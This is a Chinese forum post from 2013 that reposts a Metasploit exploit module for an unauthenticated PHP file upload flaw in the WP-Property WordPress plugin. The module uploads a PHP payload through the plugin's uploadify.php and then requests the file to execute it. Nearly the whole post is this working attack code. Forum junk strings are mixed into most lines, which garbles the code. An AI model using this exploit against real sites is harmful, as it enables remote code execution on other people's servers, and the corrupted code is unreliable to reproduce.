WordPress WP-Property PHP 文件上传漏洞* |5 T1 e5 ]5 m" o
% P4 J( u( p0 D
## # This file is part of the Metasploit Framework and may be subject to5 F% x# m/ L/ C; [- V5 b
6 F8 n5 f+ S7 R8 `' \8 j
# redistribution and commercial restrictions. Please see the Metasploit. e% J0 k: v6 t6 ?
% C6 n. P) E. m9 r. P1 V# Framework web site for more information on licensing and terms of use./ X4 O [2 }9 r5 M# ]1 y
8 A: c0 S: U! O1 F& B# http://metasploit.com/framework/ ##
5 d% ~. B7 e7 D1 `; q. p
* H9 i$ Z8 k$ ]0 r
* n: @* q1 O% q
- r2 ?9 O4 v5 S- y' c
( ]. u9 l3 G# l3 P- W$ y
: s5 d) A' E- R; Krequire 'msf/core'' J5 y1 z& M( k% @4 ~2 E D) H. h4 i
require 'msf/core/exploit/php_exe'
; f2 ^4 @, S4 l) ]" m+ B, W- h. v2 K$ p) V# A% @' F
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',: {8 V; A, j& e$ ]5 W5 g. n
'Description' => %q{; Y" o) Y' C+ y' U" T
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>0 k' k* }1 P' r) Z& Z
[8 q& _) a# j1 n ]& ?& Q* P- r
'Sammy FORGIT', # initial discovery
7 Q. t; T1 \4 k'James Fitts <fitts.james[at]gmail.com>' # metasploit module! @: D a- z& E( t0 f
],' Z! s, q- t/ z4 q0 D
'License' => MSF_LICENSE,
; n$ b) X0 V$ {0 r( W'References' =># U2 q' O0 J8 y
[
/ s9 W. z O. w[ 'OSVDB', '82656' ],# _! S4 \7 H# p6 o2 m
[ 'BID', '53787' ],
: }$ e7 e* ?) ^1 ?$ A& j( }[ 'EDB', '18987'],4 x8 c6 A* F z- P4 F% o
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]5 }' ^7 X- p: U5 g4 _4 H( |
],
1 \& M, x0 P9 x! T'Payload' =>6 G* I7 F' x% J3 b5 r: \' ^
{" M4 z4 M. _" \2 z3 ` q
'BadChars' => "\x00",
4 Q g O" ~9 A; r, t},/ [. G$ Q, g& G3 y" ]! s
'Platform' => 'php',
! A4 k/ b( m, Y' m4 g'Arch' => ARCH_PHP,
9 V# D; d$ x2 [' ~'Targets' =>
; E+ B. q/ e2 L[
8 R/ \2 l) z' K0 s1 B7 }( @[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
& C% W9 x" ^0 U& v w/ J[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]# ^( B7 l% R( [1 G. L
], m- O7 m. [! z% k
'DefaultTarget' => 0,
; j7 X4 _0 S( I' S'DisclosureDate' => 'Mar 26 2012'))6 q% [( ^6 [7 x7 V! p
* K- j5 T& S( B; }& I! N8 V
register_options(: }$ X4 }: Y; j! D
[# c9 E1 K& R$ o) F/ |, s, {
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])5 a1 C1 U7 h: }. M' U
], self.class)
. P0 V" @* t' P/ X( ~! S5 Oend
- e9 W( y$ Q8 a4 c$ P _2 {
& g' X- e- {! S' V3 Q& r5 hdef check
8 f: D9 N. }- z: u7 euri = target_uri.path
8 [; c1 ?: i1 u3 U$ X3 ^7 [2 curi << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',8 y; @, F1 m" Y7 s% W$ _* V9 f o
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
9 ^1 E6 [) d# K! l6 G( [ D& T})
0 w: C* o" D/ _4 p/ @
0 m- n& z& t" h! A* ?1 Kif not res or res.code != 200+ O# [7 Z. K# \. {# k+ x4 o
return Exploit::CheckCode::Unknown' t9 L$ s7 J q. b4 V! `
end
6 M" B' J0 e# r1 Y1 L* G# Q" z6 Z( U( J, _, F! c
return Exploit::CheckCode::Appears5 _7 X! o0 ^& U; y. A
end; r+ e1 ]. _1 s! A7 s
( l; p2 g. K* k. edef exploit
`/ [0 C0 _* }# d& Furi = target_uri.path
0 }' t2 S% ^: {, A5 Y# Puri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
- s' |3 g3 r; I. Z. o, S( f9 W! L- l- ~/ G
data = Rex::MIME::Message.new
/ _" j' n& {: T" f `/ c% a7 ?data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
/ w$ x. O+ \& A3 Gdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")# b# d; s) D; N8 @% ^
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! ?9 e3 F3 Q2 B2 J- [/ P: }, \1 [4 }& w; w
print_status("#{peer} - Uploading payload #{@payload_name}")
' m- K6 Y) x H' d4 {3 Bres = send_request_cgi({! {" @2 W6 x9 x9 k) t
'method' => 'POST',# B4 b2 k* v I' y
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",6 K$ L+ u" X% g: `
'ctype' => "multipart/form-data; boundary=#{data.bound}",
) \6 q) p3 b% ?6 [0 C# Z) D'data' => post_data
! C: {8 n- N6 C- W, t( c8 D& n})
0 g0 ]4 @) K2 T9 G) v' m, a% F. ^2 f ]* y, A7 p
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
1 R: b; B7 I" ^$ F& F4 B' l) pfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")) `4 E, L3 i$ S# L4 f/ v5 u; _
end4 N1 B$ }4 T" `& c5 N$ |7 O! p& V
6 M! S0 K, s* e! O& |1 E3 dupload_uri = res.body5 j7 Z$ b2 ~5 w7 w. U1 o4 P; E+ u
& q7 e$ X8 h+ l3 P) ]% |
print_status("#{peer} - Executing payload #{@payload_name}")
0 Y% w& c8 l1 Y- fres = send_request_raw({
) h n% z! D/ d'uri' => upload_uri,$ E1 L1 Q3 A7 K. G1 e* z1 V
'method' => 'GET'% V, y( H6 s7 \/ k* @9 h! s4 P2 n2 T
})
5 J% T. d5 F, vend! y" T0 B& I' \# P. M
end2 q R- R# H1 {) J1 b! m+ S6 X) |
7 J5 W& }& i1 `) e3 y0 i; _* Y# M
不要问我这写的是什么 怎么利用 我是说msf.' Y: i+ f A+ D3 o: G# ~/ K. }
9 B$ e$ R; C K! w4 r |
发表于 2013-1-4 19:51:30
收藏
支持
反对